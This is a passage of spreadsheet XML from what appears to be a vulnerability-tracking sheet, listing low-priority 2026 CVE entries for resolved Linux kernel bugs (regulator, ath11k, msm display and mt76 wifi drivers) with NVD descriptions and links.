      <c r="A728" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B728" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90360</t>
        </is>
      </c>
      <c r="D728" s="5" t="inlineStr"/>
      <c r="E728" s="5" t="inlineStr"/>
      <c r="F728" s="5" t="inlineStr"/>
      <c r="G728" s="5" t="inlineStr"/>
      <c r="H728" s="5" t="inlineStr"/>
      <c r="I728" s="5" t="inlineStr"/>
      <c r="J728" s="5" t="inlineStr"/>
      <c r="K728" s="5" t="inlineStr"/>
      <c r="L728" s="5" t="inlineStr"/>
      <c r="M728" s="5" t="inlineStr"/>
      <c r="N728" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O728" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P728" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q728" s="5" t="inlineStr"/>
      <c r="R728" s="5" t="inlineStr"/>
      <c r="S728" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
regulator: core: use system_freezable_wq for init complete work
schedule_delayed_work() uses system_wq, which is non-freezable, allowing
regulator_init_complete_work to run concurrently with system suspend. This
work fires ~30s after boot to disable unused regulators via I2C. When it
races with PM suspend, the I2C adapter may already be suspended, triggering
a -ESHUTDOWN warning in __i2c_transfer():
  WARNING: ... at __i2c_transfer+0x36c/0x3c8
  Call trace:
   __i2c_transfer
   i2c_transfer
   regmap_i2c_write
   _regmap_update_bits
   regulator_disable_regmap
   _regulator_do_disable
   regulator_late_cleanup
   regulator_init_complete_work_function
   process_one_work
Switch to system_freezable_wq so the work is frozen before any device
is suspended, eliminating the race.</t>
        </is>
      </c>
      <c r="T728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90360</t>
        </is>
      </c>
    </row>
    <row r="729">
      <c r="A729" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B729" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90361</t>
        </is>
      </c>
      <c r="D729" s="5" t="inlineStr"/>
      <c r="E729" s="5" t="inlineStr"/>
      <c r="F729" s="5" t="inlineStr"/>
      <c r="G729" s="5" t="inlineStr"/>
      <c r="H729" s="5" t="inlineStr"/>
      <c r="I729" s="5" t="inlineStr"/>
      <c r="J729" s="5" t="inlineStr"/>
      <c r="K729" s="5" t="inlineStr"/>
      <c r="L729" s="5" t="inlineStr"/>
      <c r="M729" s="5" t="inlineStr"/>
      <c r="N729" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O729" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P729" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q729" s="5" t="inlineStr"/>
      <c r="R729" s="5" t="inlineStr"/>
      <c r="S729" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath11k: fix leak in ath11k_service_ready_ext_event()
Currently, during ath11k_service_ready_ext_event() processing,
svc_rdy_ext.mac_phy_caps can be allocated during TLV parsing. This is a
temporary allocation that is freed on the success path, but not on the
error path. If parsing succeeds far enough to allocate mac_phy_caps and
then fails on a later TLV, the allocation leaks. So free the allocation
on the error path.
Compile tested only.</t>
        </is>
      </c>
      <c r="T729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90361</t>
        </is>
      </c>
    </row>
    <row r="730">
      <c r="A730" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B730" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90362</t>
        </is>
      </c>
      <c r="D730" s="5" t="inlineStr"/>
      <c r="E730" s="5" t="inlineStr"/>
      <c r="F730" s="5" t="inlineStr"/>
      <c r="G730" s="5" t="inlineStr"/>
      <c r="H730" s="5" t="inlineStr"/>
      <c r="I730" s="5" t="inlineStr"/>
      <c r="J730" s="5" t="inlineStr"/>
      <c r="K730" s="5" t="inlineStr"/>
      <c r="L730" s="5" t="inlineStr"/>
      <c r="M730" s="5" t="inlineStr"/>
      <c r="N730" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O730" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P730" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q730" s="5" t="inlineStr"/>
      <c r="R730" s="5" t="inlineStr"/>
      <c r="S730" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/msm/dsi: Drop dev_pm_opp_set_rate(0)
dev_pm_opp_set_rate(0) removes the vote specified in required-opps but
does not actually park the clock, making it run without the necessary
power backing. Drop the explicit call to it.
Every call site of ops-&gt;link_clk_disable() is followed by
pm_runtime_put(), so the power vote will be rescinded if deemed safe.
Patchwork: https://patchwork.freedesktop.org/patch/742783/</t>
        </is>
      </c>
      <c r="T730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90362</t>
        </is>
      </c>
    </row>
    <row r="731">
      <c r="A731" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B731" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C731" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90363</t>
        </is>
      </c>
      <c r="D731" s="5" t="inlineStr"/>
      <c r="E731" s="5" t="inlineStr"/>
      <c r="F731" s="5" t="inlineStr"/>
      <c r="G731" s="5" t="inlineStr"/>
      <c r="H731" s="5" t="inlineStr"/>
      <c r="I731" s="5" t="inlineStr"/>
      <c r="J731" s="5" t="inlineStr"/>
      <c r="K731" s="5" t="inlineStr"/>
      <c r="L731" s="5" t="inlineStr"/>
      <c r="M731" s="5" t="inlineStr"/>
      <c r="N731" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O731" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P731" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q731" s="5" t="inlineStr"/>
      <c r="R731" s="5" t="inlineStr"/>
      <c r="S731" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/msm: don't tear down KMS twice when KMS init fails
When priv-&gt;kms_init() (mdp4_kms_init() / mdp5_kms_init()) fails partway
through, both display drivers already tear their KMS state down via
mdp4_destroy() / mdp5_kms_destroy() before returning the error. The
common error path in msm_drm_init() then runs msm_drm_uninit() -&gt;
msm_drm_kms_uninit(), which tries to destroy the very same KMS a second
time, which causes a use-after-free crash.
Bring MDP4/MDP5 in line with the DPU driver whose dpu_kms_init() doesn't
perform error cleanup on the failure. Let the common path own the
cleanup, instead of freeing the KMS from their error paths.
The crash trace for the reference:
  __lock_acquire from lock_acquire (kernel/locking/lockdep.c:5906 kernel/locking/lockdep.c:5863)
  lock_acquire from touch_wq_lockdep_map (kernel/workqueue.c:4094 (discriminator 1))
  touch_wq_lockdep_map from __flush_workqueue (kernel/workqueue.c:4136)
  __flush_workqueue from msm_drm_kms_uninit (drivers/gpu/drm/msm/msm_kms.c:243 (discriminator 33))
  msm_drm_kms_uninit from msm_drm_uninit (drivers/gpu/drm/msm/msm_drv.c:93)
  msm_drm_uninit from msm_drm_init (drivers/gpu/drm/msm/msm_drv.c:184)
  msm_drm_init from try_to_bring_up_aggregate_device (drivers/base/component.c:249 drivers/base/component.c:227)
  try_to_bring_up_aggregate_device from __component_add (drivers/base/component.c:269 drivers/base/component.c:748)
  __component_add from dsi_host_attach (drivers/gpu/drm/msm/dsi/dsi_host.c:1739)
  dsi_host_attach from mipi_dsi_attach (drivers/gpu/drm/drm_mipi_dsi.c:383)
  mipi_dsi_attach from sharp_nt_panel_probe (drivers/gpu/drm/panel/panel-sharp-ls043t1le01.c:247)
Patchwork: https://patchwork.freedesktop.org/patch/742068/</t>
        </is>
      </c>
      <c r="T731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90363</t>
        </is>
      </c>
    </row>
    <row r="732">
      <c r="A732" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B732" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C732" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90364</t>
        </is>
      </c>
      <c r="D732" s="5" t="inlineStr"/>
      <c r="E732" s="5" t="inlineStr"/>
      <c r="F732" s="5" t="inlineStr"/>
      <c r="G732" s="5" t="inlineStr"/>
      <c r="H732" s="5" t="inlineStr"/>
      <c r="I732" s="5" t="inlineStr"/>
      <c r="J732" s="5" t="inlineStr"/>
      <c r="K732" s="5" t="inlineStr"/>
      <c r="L732" s="5" t="inlineStr"/>
      <c r="M732" s="5" t="inlineStr"/>
      <c r="N732" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O732" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P732" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q732" s="5" t="inlineStr"/>
      <c r="R732" s="5" t="inlineStr"/>
      <c r="S732" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ACPI: processor: Unregister cpufreq notifier on init failure
acpi_processor_driver_init() registers the cpufreq policy notifier before
registering the ACPI processor driver and setting up CPU hotplug state.
If driver_register() or cpuhp_setup_state() fails, the error path only
unregisters the ACPI processor driver and the idle driver. The cpufreq
notifier remains registered even though initialization failed.
Mirror the module exit path on the init failure path and unregister the
cpufreq notifier when it has been registered.</t>
        </is>
      </c>
      <c r="T732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90364</t>
        </is>
      </c>
    </row>
    <row r="733">
      <c r="A733" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B733" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C733" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90365</t>
        </is>
      </c>
      <c r="D733" s="5" t="inlineStr"/>
      <c r="E733" s="5" t="inlineStr"/>
      <c r="F733" s="5" t="inlineStr"/>
      <c r="G733" s="5" t="inlineStr"/>
      <c r="H733" s="5" t="inlineStr"/>
      <c r="I733" s="5" t="inlineStr"/>
      <c r="J733" s="5" t="inlineStr"/>
      <c r="K733" s="5" t="inlineStr"/>
      <c r="L733" s="5" t="inlineStr"/>
      <c r="M733" s="5" t="inlineStr"/>
      <c r="N733" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O733" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P733" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q733" s="5" t="inlineStr"/>
      <c r="R733" s="5" t="inlineStr"/>
      <c r="S733" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: cancel reset and rc work on device unregister
Both drivers cancelled dump_work on unregister but left reset_work and
rc_work to be flushed only by destroy_workqueue() in mt76_free_device(),
which runs after the hw is unregistered and the hardware stopped. A
reset_work that fires in that window calls ieee80211_restart_hw() and
re-arms mac_work on an unregistered hw, and rc_work touches station state
being torn down. Cancel both up front, alongside dump_work.</t>
        </is>
      </c>
      <c r="T733" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90365</t>
        </is>
      </c>
    </row>
    <row r="734">
      <c r="A734" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B734" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C734" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90366</t>
        </is>
      </c>
      <c r="D734" s="5" t="inlineStr"/>
      <c r="E734" s="5" t="inlineStr"/>
      <c r="F734" s="5" t="inlineStr"/>
      <c r="G734" s="5" t="inlineStr"/>
      <c r="H734" s="5" t="inlineStr"/>
      <c r="I734" s="5" t="inlineStr"/>
      <c r="J734" s="5" t="inlineStr"/>
      <c r="K734" s="5" t="inlineStr"/>
      <c r="L734" s="5" t="inlineStr"/>
      <c r="M734" s="5" t="inlineStr"/>
      <c r="N734" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O734" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P734" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q734" s="5" t="inlineStr"/>
      <c r="R734" s="5" t="inlineStr"/>
      <c r="S734" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: reserve space for the CSA-abort countdown TLV
When a CSA countdown is active, mt7996_mcu_beacon_cntdwn() emits two
bss_bcn_cntdwn_tlv entries (the CSA countdown and the CCA-abort BCC), but
MT7996_BEACON_UPDATE_SIZE only reserved one. With MBSSID enabled and a
near-maximum beacon template the extra 8 bytes could push the offload
command past MT7996_MAX_BSS_OFFLOAD_SIZE and trigger skb_over_panic().
Reserve room for both countdown TLVs.</t>
        </is>
      </c>
      <c r="T734" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90366</t>
        </is>
      </c>
    </row>
    <row r="735">
      <c r="A735" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B735" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C735" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90367</t>
        </is>
      </c>
      <c r="D735" s="5" t="inlineStr"/>
      <c r="E735" s="5" t="inlineStr"/>
      <c r="F735" s="5" t="inlineStr"/>
      <c r="G735" s="5" t="inlineStr"/>
      <c r="H735" s="5" t="inlineStr"/>
      <c r="I735" s="5" t="inlineStr"/>
      <c r="J735" s="5" t="inlineStr"/>
      <c r="K735" s="5" t="inlineStr"/>
      <c r="L735" s="5" t="inlineStr"/>
      <c r="M735" s="5" t="inlineStr"/>
      <c r="N735" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O735" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P735" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q735" s="5" t="inlineStr"/>
      <c r="R735" s="5" t="inlineStr"/>
      <c r="S735" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: hold dev-&gt;mt76.mutex while disabling tx worker in SER
mt7996_mac_reset_work() parked the tx worker and disabled the RX/TX NAPIs
before taking dev-&gt;mt76.mutex. mt76_worker_disable()/_enable() are plain
kthread park/unpark, not refcounted, and __mt76_set_channel() toggles the
same worker and the MT76_RESET bit under the mutex. An L1 SER racing a
channel switch could therefore have the worker unparked and MT76_RESET
cleared while the reset path resets the DMA rings, corrupting descriptors
or tokens. Take the mutex before disabling the worker, as mt7915 does.</t>
        </is>
      </c>
      <c r="T735" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90367</t>
        </is>
      </c>
    </row>
    <row r="736">
      <c r="A736" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B736" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C736" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90368</t>
        </is>
      </c>
      <c r="D736" s="5" t="inlineStr"/>
      <c r="E736" s="5" t="inlineStr"/>
      <c r="F736" s="5" t="inlineStr"/>
      <c r="G736" s="5" t="inlineStr"/>
      <c r="H736" s="5" t="inlineStr"/>
      <c r="I736" s="5" t="inlineStr"/>
      <c r="J736" s="5" t="inlineStr"/>
      <c r="K736" s="5" t="inlineStr"/>
      <c r="L736" s="5" t="inlineStr"/>
      <c r="M736" s="5" t="inlineStr"/>
      <c r="N736" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O736" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P736" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q736" s="5" t="inlineStr"/>
      <c r="R736" s="5" t="inlineStr"/>
      <c r="S736" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7915: unwind state on add_interface failure
When mt76_wcid_alloc() fails, mt7915_add_interface() returned without
clearing the vif_mask/omac_mask bits it had already set, without removing
the firmware dev info added earlier, and without clearing a monitor_vif
pointer to the vif mac80211 is about to free. mac80211 does not call
remove_interface() for a failed add, so the indices and firmware dev
entry leaked permanently and testmode could dereference the stale
monitor_vif. Add a proper error unwind.</t>
        </is>
      </c>
      <c r="T736" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90368</t>
        </is>
      </c>
    </row>
    <row r="737">
      <c r="A737" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B737" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C737" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90369</t>
        </is>
      </c>
      <c r="D737" s="5" t="inlineStr"/>
      <c r="E737" s="5" t="inlineStr"/>
      <c r="F737" s="5" t="inlineStr"/>
      <c r="G737" s="5" t="inlineStr"/>
      <c r="H737" s="5" t="inlineStr"/>
      <c r="I737" s="5" t="inlineStr"/>
      <c r="J737" s="5" t="inlineStr"/>
      <c r="K737" s="5" t="inlineStr"/>
      <c r="L737" s="5" t="inlineStr"/>
      <c r="M737" s="5" t="inlineStr"/>
      <c r="N737" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O737" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P737" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q737" s="5" t="inlineStr"/>
      <c r="R737" s="5" t="inlineStr"/>
      <c r="S737" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: fix out-of-bounds access in mmio copy helpers
mt76_mmio_write_copy() and mt76_mmio_read_copy() iterate up to
ALIGN(len, 4), so a length that is not a multiple of four reads past the
source buffer (write_copy) or writes past the destination (read_copy).
Copy the aligned body in the loop and handle the remaining tail through a
4-byte bounce buffer, keeping the register access width unchanged.</t>
        </is>
      </c>
      <c r="T737" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90369</t>
        </is>
      </c>
    </row>
    <row r="738">
      <c r="A738" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B738" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C738" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90370</t>
        </is>
      </c>
      <c r="D738" s="5" t="inlineStr"/>
      <c r="E738" s="5" t="inlineStr"/>
      <c r="F738" s="5" t="inlineStr"/>
      <c r="G738" s="5" t="inlineStr"/>
      <c r="H738" s="5" t="inlineStr"/>
      <c r="I738" s="5" t="inlineStr"/>
      <c r="J738" s="5" t="inlineStr"/>
      <c r="K738" s="5" t="inlineStr"/>
      <c r="L738" s="5" t="inlineStr"/>
      <c r="M738" s="5" t="inlineStr"/>
      <c r="N738" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O738" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P738" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q738" s="5" t="inlineStr"/>
      <c r="R738" s="5" t="inlineStr"/>
      <c r="S738" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: bound TLV walk in mt7996_mcu_get_chip_config
The response TLV loop advanced by tlv-&gt;len without a minimum, so a
theoretical firmware response containing a zero-length TLV could spin
forever, hanging the CPU during device probe.
The u32 payload was also read without bounds checking.
Reject a short fixed field, stop on a TLV whose length underruns the
header or overruns the skb.</t>
        </is>
      </c>
      <c r="T738" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90370</t>
        </is>
      </c>
    </row>
    <row r="739">
      <c r="A739" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B739" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C739" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90371</t>
        </is>
      </c>
      <c r="D739" s="5" t="inlineStr"/>
      <c r="E739" s="5" t="inlineStr"/>
      <c r="F739" s="5" t="inlineStr"/>
      <c r="G739" s="5" t="inlineStr"/>
      <c r="H739" s="5" t="inlineStr"/>
      <c r="I739" s="5" t="inlineStr"/>
      <c r="J739" s="5" t="inlineStr"/>
      <c r="K739" s="5" t="inlineStr"/>
      <c r="L739" s="5" t="inlineStr"/>
      <c r="M739" s="5" t="inlineStr"/>
      <c r="N739" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O739" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P739" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q739" s="5" t="inlineStr"/>
      <c r="R739" s="5" t="inlineStr"/>
      <c r="S739" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: fix RXDMAD_C buffer recycling race
The RXDMAD_C buffers come from the RRO data queues' page pools, which are
bound to a different NAPI, so the direct page-pool recycle used here could
race the owning NAPI; take the non-direct path as is already done for WED
RX queues.</t>
        </is>
      </c>
      <c r="T739" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90371</t>
        </is>
      </c>
    </row>
    <row r="740">
      <c r="A740" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B740" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C740" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90372</t>
        </is>
      </c>
      <c r="D740" s="5" t="inlineStr"/>
      <c r="E740" s="5" t="inlineStr"/>
      <c r="F740" s="5" t="inlineStr"/>
      <c r="G740" s="5" t="inlineStr"/>
      <c r="H740" s="5" t="inlineStr"/>
      <c r="I740" s="5" t="inlineStr"/>
      <c r="J740" s="5" t="inlineStr"/>
      <c r="K740" s="5" t="inlineStr"/>
      <c r="L740" s="5" t="inlineStr"/>
      <c r="M740" s="5" t="inlineStr"/>
      <c r="N740" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O740" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P740" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q740" s="5" t="inlineStr"/>
      <c r="R740" s="5" t="inlineStr"/>
      <c r="S740" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7915: avoid nss underflow in mt7915_mcu_get_sta_nss
If a peer's VHT/HE MCS map has no supported spatial stream (all fields
0x3), the loop exits with nss == 0 and the function returned (u8)-1 (255),
which was then written into the firmware sta_rec_bf beamforming fields.
Clamp the result to 0.</t>
        </is>
      </c>
      <c r="T740" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90372</t>
        </is>
      </c>
    </row>
    <row r="741">
      <c r="A741" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B741" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C741" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90373</t>
        </is>
      </c>
      <c r="D741" s="5" t="inlineStr"/>
      <c r="E741" s="5" t="inlineStr"/>
      <c r="F741" s="5" t="inlineStr"/>
      <c r="G741" s="5" t="inlineStr"/>
      <c r="H741" s="5" t="inlineStr"/>
      <c r="I741" s="5" t="inlineStr"/>
      <c r="J741" s="5" t="inlineStr"/>
      <c r="K741" s="5" t="inlineStr"/>
      <c r="L741" s="5" t="inlineStr"/>
      <c r="M741" s="5" t="inlineStr"/>
      <c r="N741" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O741" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P741" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q741" s="5" t="inlineStr"/>
      <c r="R741" s="5" t="inlineStr"/>
      <c r="S741" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7915: clear wcid mask under mutex after RCU pointer clear
mt7915_remove_interface() cleared the wcid mask bit with no lock held and
before clearing the RCU wcid pointer. The mask is a non-atomic RMW shared
with the allocators, which all run under dev-&gt;mt76.mutex; on DBDC the two
wiphys share one mt76_dev, so this raced add_interface/sta_add on the
other band and could leak or double-hand-out a wcid. Clearing the bit
before the RCU pointer also let a concurrent allocation reuse the index
and publish its wcid, which the subsequent NULL assignment then wiped.
Move the clear into the existing mutex section, after the RCU pointer is
cleared.</t>
        </is>
      </c>
      <c r="T741" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90373</t>
        </is>
      </c>
    </row>
    <row r="742">
      <c r="A742" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B742" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C742" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90374</t>
        </is>
      </c>
      <c r="D742" s="5" t="inlineStr"/>
      <c r="E742" s="5" t="inlineStr"/>
      <c r="F742" s="5" t="inlineStr"/>
      <c r="G742" s="5" t="inlineStr"/>
      <c r="H742" s="5" t="inlineStr"/>
      <c r="I742" s="5" t="inlineStr"/>
      <c r="J742" s="5" t="inlineStr"/>
      <c r="K742" s="5" t="inlineStr"/>
      <c r="L742" s="5" t="inlineStr"/>
      <c r="M742" s="5" t="inlineStr"/>
      <c r="N742" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O742" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P742" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q742" s="5" t="inlineStr"/>
      <c r="R742" s="5" t="inlineStr"/>
      <c r="S742" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: validate RX band_idx before dereferencing phys[]
band_idx comes from a 2-bit descriptor field (0-3) and was used directly
to index dev-&gt;mt76.phys[] (size __MT_MAX_BAND == 3) and dereference the
result. A corrupt or reserved descriptor value could index out of bounds
or hit a NULL phy on parts with fewer bands. Reject invalid band indices,
mirroring mt7996_rx_get_wcid().</t>
        </is>
      </c>
      <c r="T742" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90374</t>
        </is>
      </c>
    </row>
    <row r="743">
      <c r="A743" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B743" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C743" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90375</t>
        </is>
      </c>
      <c r="D743" s="5" t="inlineStr"/>
      <c r="E743" s="5" t="inlineStr"/>
      <c r="F743" s="5" t="inlineStr"/>
      <c r="G743" s="5" t="inlineStr"/>
      <c r="H743" s="5" t="inlineStr"/>
      <c r="I743" s="5" t="inlineStr"/>
      <c r="J743" s="5" t="inlineStr"/>
      <c r="K743" s="5" t="inlineStr"/>
      <c r="L743" s="5" t="inlineStr"/>
      <c r="M743" s="5" t="inlineStr"/>
      <c r="N743" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O743" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P743" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
